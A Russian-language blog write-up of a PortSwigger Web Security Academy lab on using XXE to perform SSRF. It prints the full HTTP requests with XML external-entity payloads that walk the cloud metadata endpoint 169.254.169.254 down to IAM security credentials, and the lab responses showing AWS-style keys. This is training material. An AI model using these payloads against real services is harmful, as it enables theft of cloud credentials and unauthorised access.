Для решения лабы нужно с помощью уязвимости XXE совершить SSRF на адрес http://169.254.169.254/ и получить секретный ключ.

https://0a6f00c5035d75538061f390007400b6.web-security-academy.net/

Solution

Все еще кажется, что XXE можно будет найти в получении информации о товарах. Схожу на страницу товара:

А вот и XML:

POST /product/stock HTTP/2
Host: 0a6f00c5035d75538061f390007400b6.web-security-academy.net
Cookie: session=HJbEYMxPozoQuPG4Pot5LKYbtl6dLjAu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a6f00c5035d75538061f390007400b6.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 107
Origin: https://0a6f00c5035d75538061f390007400b6.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Чтож. Мне нужно отправить запрос эндпоинт http://169.254.169.254/. Это и сделаю, задав внешнюю сущность по ссылке:

<!DOCTYPE foo [ <!ENTITY payload SYSTEM "http://169.254.169.254/"> ]>

Соберу запрос:

POST /product/stock HTTP/2
Host: 0a6f00c5035d75538061f390007400b6.web-security-academy.net
Cookie: session=HJbEYMxPozoQuPG4Pot5LKYbtl6dLjAu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a6f00c5035d75538061f390007400b6.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 196
Origin: https://0a6f00c5035d75538061f390007400b6.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY payload SYSTEM "http://169.254.169.254/"> ]>
<stockCheck><productId>
&payload;
</productId><storeId>
1
</storeId></stockCheck>

Ответ:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 30

"Invalid product ID: 
latest
"

Отправлю следующий запрос:

POST /product/stock HTTP/2
Host: 0a6f00c5035d75538061f390007400b6.web-security-academy.net
Cookie: session=HJbEYMxPozoQuPG4Pot5LKYbtl6dLjAu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a6f00c5035d75538061f390007400b6.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 202
Origin: https://0a6f00c5035d75538061f390007400b6.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY payload SYSTEM "http://169.254.169.254/latest"> ]>
<stockCheck><productId>
&payload;
</productId><storeId>
1
</storeId></stockCheck>

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 33

"Invalid product ID: 
meta-data
"

А вот и финальный запрос:

POST /product/stock HTTP/2
Host: 0a6f00c5035d75538061f390007400b6.web-security-academy.net
Cookie: session=HJbEYMxPozoQuPG4Pot5LKYbtl6dLjAu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a6f00c5035d75538061f390007400b6.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 243
Origin: https://0a6f00c5035d75538061f390007400b6.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY payload SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>
&payload;
</productId><storeId>
1
</storeId></stockCheck>

А вот и креды:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 554

"Invalid product ID: 
{
  "Code" : "Success",
  "LastUpdated" : "2025-10-29T13:14:16.291630505Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "mdS9llimRwDUJTz7rUCM",
  "SecretAccessKey" : "8CFmE684zPYIJiofIzMdu1mlOrgn4iOEpGL9Nof0",
  "Token" : "levygd2CgVt2YvloZW4dMM2kPmhRUjppUH3KYqq9jD9r03KU8scdRF27vVC0XK1FTV9NUl8sIdVnj9Ke3bdJa5ljPimvUngRdGoonxOFlKJAdfKzng9eTaAimDaAAB9edserKFYJ0Rvk8UuPVq4HeB8lYmCI9PCk9MUUAWIA1bAglE668A6IP5cxkBDF2Bdmk6BcZtg8CwPup4pvWsYQY4YwgiPSOpXZkDY0n9RKshQz4jWZ2hUJT7MhUHFqpDOh",
  "Expiration" : "2031-10-28T13:14:16.291630505Z"
}
"

Share on

X Facebook LinkedIn Bluesky

Exploiting XXE to perform SSRF attacks

Kir 'cu63'

Solution

Share on

You May Also Enjoy

Простые LKM: фундамент для kernel-руткитов

Файлы, начинающиеся с ‘-‘ и почему это ломает скрипты

Exploiting blind XXE to exfiltrate data using a malicious external DTD

Exploiting blind XXE to retrieve data via error messages